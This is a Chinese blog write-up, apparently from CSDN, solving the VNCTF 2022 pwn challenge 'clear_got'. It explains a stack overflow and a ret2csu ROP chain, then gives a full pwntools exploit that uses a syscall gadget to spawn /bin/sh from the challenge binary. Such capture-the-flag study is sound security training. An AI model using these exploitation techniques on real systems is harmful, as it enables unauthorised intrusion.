2022 vnctf pwn clear_got

最新推荐文章于 2022-05-02 14:29:26 发布
最新推荐文章于 2022-05-02 14:29:26 发布
阅读量882 收藏 3
点赞数 1
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/122949366
版权

在这里插入图片描述got表能覆写
没有canary pie

在这里插入图片描述程序的逻辑很简单
一个栈溢出之后将got表全部清空。

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
给了两个系统调用。

那么我们的解题思路。

首先利用ret2csu来控制寄存器

payload = "a"*0x68
payload += p64(0x4007ea) 
payload += p64(0xc01c8) #rbx
payload += p64(0xc01c9) #rbp
payload += p64(0) #r12
payload += p64(59) #rdx
payload += p64(0x601060) #rsi
payload += p64(0) #rdi
payload += p64(0x4007d0)

在这里插入图片描述
call的时候通过rbx r12来得到ret的地址

那么应该填哪呢?
我们选择
在这里插入图片描述动态链接的时候会用到的一些函数这里

0x600e40这里会有一个init函数供我们使用
在这里插入图片描述在控制r12与rbx的时候都可以
所以payload也可以这么写

payload = "a"*0x68
payload += p64(0x4007ea) 
payload += p64(0) #rbx
payload += p64(0x1) #rbp
payload += p64(0x600e40) #r12
payload += p64(59) #rdx
payload += p64(0x601060) #rsi
payload += p64(0) #rdi
payload += p64(0x4007d0) 
#ret2csu

还有一点要注意的是
在call的时候我们栈里的值发生了一点点变化
在这里插入图片描述

在这里插入图片描述当然是因为那个地方是call压好的返回地址。
call的时候相当于push jump
当然会把返回地址压进去。

下面是_init的代码
在这里插入图片描述

在这里插入图片描述将rax设成0之后init函数就没啥作用了
直接返回到call的后面。

在这里插入图片描述出来之后呢会让rbx与rbp做一个比较
我们这里必须让他俩相等,这样会再次跳到控制寄存器的地方,否则
在这里插入图片描述它会再次跳回去,下次call的时候因为rbx已经发生了变化,会导致下面崩掉。

在这里插入图片描述所以我们通过第一次控制好所有寄存器之后,我们先read一下,读入的个数我们控制成51
也就是变相控制了rax

用控制好的r12想返回哪返回到哪
我们选择写binsh的时候后面顺便带上syscall地址
然后r12写成那个地址。
在这里插入图片描述
完成exp

# -*- coding: utf-8 -*-
from pwn import *

p = process("./clear_got")

context.log_level = "debug"
payload = "a"*0x68
payload += p64(0x4007ea) 
payload += p64(0) #rbx
payload += p64(0x1) #rbp
payload += p64(0x600e40) #r12
payload += p64(59) #rdx
payload += p64(0x601060) #rsi
payload += p64(0) #rdi
payload += p64(0x4007d0) 
#ret2csu

payload += "A"*8
payload += p64(0) #rbx
payload += p64(0) #rbp
payload += p64(0x601068) #r12
payload += p64(0) #r13  rdx
payload += p64(0) #r14  rs1
payload += p64(0x601060) #r15  rdi
payload += p64(0x40076e) #syscall
payload += p64(0) #rbp
payload += p64(0x4007d0) #

payload += "A"*8

p.send(payload)
payload = "/bin/sh\x00" + p64(0x40076e) + 43 * '\x00'
p.sendline(payload)
p.interactive()
yongbaoii
关注
专栏目录
VNCTF2022_Pwn_clear_got_WP
weixin_56434818的博客
02-14 868
VNCTF2022_Pwn_clear_got_WP 文章目录VNCTF2022_Pwn_clear_got_WP检查文件IDA查看题给elf文件利用思路exp 检查文件 RELRO半开,没有canary,开NX,没开PIE。 IDA查看题给elf文件 int __cdecl main(int argc, const char **argv, const char **envp) { char buf[92]; // [rsp+0h] [rbp-60h] BYREF int v5; // [rsp
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 991
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
VNCTF2022 clear_got
u014377094的博客
03-02 324
checksec一下 打开ida buf哪里有个明显的栈溢出,shift f12也没发现system和‘binsh’,初步判断是利用LibcSearcher找system的题。下面memset(601008)直接把got表清了,但恰好还剩一个__libc_start_main,左边的end2中可以利用write函数,因此可以利用write函数把 __libc_start_main的真实地址打出来,然后再去找system。但是有一点需要记着,memset got表里的东西也被清了,因此常规那样在ro.
*CTF 2022 pwn examination
weixin_46483787的博客
04-17 505
题目主要实现了两个角色,每个角色四五个功能,漏洞点主要有以下几点: 当学生的question_number为1,并且pray过一次,老师在给分的时候就会扣十分,由于question_number为1,所以分数会模10,即小于10,减10之后发生负溢出,变成个很大的数。 从而可以进入这里的功能: 这里可以泄露堆地址,并且可以让一个已知地址指向的值加一 然后是这里: 这里可以修改一个堆地址的低1字节,从而修改堆块结构,将下一个chunk的size改大,释放后将libc内地址踩进可控堆块,泄露libc。 然
[*CTF 2022 pwn] examination
weixin_52640415的博客
04-17 583
抽空参加个比赛,水平有限只作了一道题,但还是要记录一下,毕竟好多人还0解呢。学渣的逆袭。 英文写的是ret2shool 这个跟ret2XXX的没关系。 代码长了读程序就麻烦,慢慢读把函数功能整理如下(叫法随个人理解,英文看单词不认识): 教师菜单 增加学生:增加一个学生结构,管理块chunk :0x28含指向成绩单:stud{ptr_s,0,0,0,0} 成绩单chunk:0x18含学生评级,成绩,评价指针,评价长度 s{int idx,int score, ptr_prv,int x,int pr
NahamCon CTF 2022 pwn 部分writeup
z1r0的博客
05-02 1001
NahamCon CTF 2022 pwn writeup Babiersteps ret2text from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
网络安全领域,特别是针对Pwn(破解)类竞赛,"jmp_rsp"是一个常见的技术概念,主要涉及栈溢出漏洞的利用。广东大学生网络攻防大赛中的这个“jmp_rsp”题目显然是设计来测试参赛者对这类漏洞的理解和利用能力。...
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲 仿真_脉冲发生器PWM
09-24
PWM,即脉宽调制(Pulse Width Modulation),是一种广泛应用的数字控制技术,主要用于调节电子设备的功率或模拟信号。在单片机系统中,PWM脉冲发生器是核心部件,它通过改变脉冲宽度来调整输出信号的平均电压,从而...
【CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3
arttnba3的博客
04-05 1027
【CTF题解NO.00007】VNCTF2021 - pwn - write up by arttnba3[github blog addr there](https://arttnba3.cn/2020/09/08/CTF-0X00-BUUOJ-PWN/)VNCTF2021 - Pwn[VNCTF 2021]White_Give_Flag - read out of bounds[VNCTF 2021]ff - tcache poisoning + IO\_FILE hijackglibc2.32下tca
2022 VNCTF easyROPtocol
weixin_46483787的博客
04-09 1813
一道协议逆向+orwROP的题,基本上难度在于给出符合要求的协议头和校验和 拿到题目: 在打印的信息中我们可以获取到,这个程序是TCP protocol的C语言实现 于是先把TCP的头部结构拿过来: 首先进add函数里看看: 可以看到能够申请最多4个chunk,每个chunk最多0x1000 生成之后要通过check_head函数和check_sum的检测 首先看check_head: 从这里可以得到确定一些头部信息,如源端口和目的端口,还有urgent_ptr必须为0,等,还有一些属性只能缩小范围,
2022DASCTF X SU 三月春季挑战赛-reverse-easyre(复现)
ookami6497的博客
04-03 904
先用PE查壳,一开始没看清楚,以为没壳,动调了半天,后来才看到是个ASP壳 用工具脱壳后分析main函数 int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[50]; // [esp+1Ch] [ebp-74h] BYREF _BYTE v5[50]; // [esp+4Eh] [ebp-42h] BYREF _DWORD v6[3]; // [esp+80h] [ebp-10h] BY.
HackPack CTF 2022 WriteUp
04-09 980
文章目录pwn-Terminal Overdriveweb-Imported Kimchi 1web-Imported Kimchi 2rev-3T PHON3 HOM3rev-Self-Hosted Cryptorev-Shopkeeper 1rev-Shopkeeper 2rev-Shopkeeper 3 pwn-Terminal Overdrive # -*- coding: utf-8 -*- from pwn import * r = remote('cha.hackpack.club',1099
2022 TQLCTF pwn easyvm
yongbaoii的博客
02-22 632
题目很有意思,肝了不少时间。
[VNCTF 2022]ezmath wp
bestkasscn的博客
02-28 802
[VNCTF 2022]ezmath wp 一个sha256爆破+一个数学问题,可以去百度一下,得到答案就是num * 4,但是查看源码可以发现要提交777次答案,所以只能写脚本来解决,这类交互题一般是去nc服务器,也可以使用python中的第三方库pwntools。 exp from hashlib import sha256 import random from pwn import * import string # 创建由大小写字母和数字组成的字典 dir = string.ascii_lette
2022 MRCTF pwn ezbash
weixin_46483787的博客
04-25 575
昨天打的mrctf上的一道题,大概数了一下有十几个解吧,算是签到题 题目给出了一个程序,运行起来之后是一个bash环境,但是里面的文件都是堆上的内存。拿到题目之后首先分析一下文件结构体: 这里写的稍微有点问题,其实标志位是前四位,然后file_name的offset为4到20,20到24是这四个字节没有用,是空的,不过懒得改了,凑活着看吧 其中标志位标识当前chunk是一个文件还是一个文件夹 其他函数具体怎么逆向过程就不说了,好麻烦 如果在逆向上卡住的可以给我发私信,我把逆完的i64发你 然后看下洞在哪:
VNCTF2022 WriteUp
mumuzi的博客
02-13 3108
VNCTF2022
[BUUCTF]PWN——[V&N2020 公开赛]easyTHeap
mcmuyanga的博客
01-04 317
[V&N2020 公开赛]easyTHeap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,常见的堆的菜单 64位ida载入,main函数 最多只能申请7个chunk,delete只能执行3次 add() add函数只能创建一个chunk,不能读入数据,读入数据需要用到edit函数 edit() show() delete() 这题的libc是2.27,在libc2.26之后的libc版本中加入了新的存储结构tcache,这使得我们利用堆的时候要特别注
【转】一个4年CTF入门者自述:曾经掉过的坑与干货总结
knaha的博客
07-09 4127
转载自 https://zhuanlan.zhihu.com/p/21685384?utm_source=qq&utm_medium=social&utm_oi=791204951979339776 一个巧合的机会,成为了CTF夺旗爱好者,一个ctf小白。从12年开始国内大大小小的CTF比赛我都看过,那会还没有统一叫CTF,都是叫 网络攻防赛、信息安全赛之类的,目的就是为了通过技...
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
最新发布
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值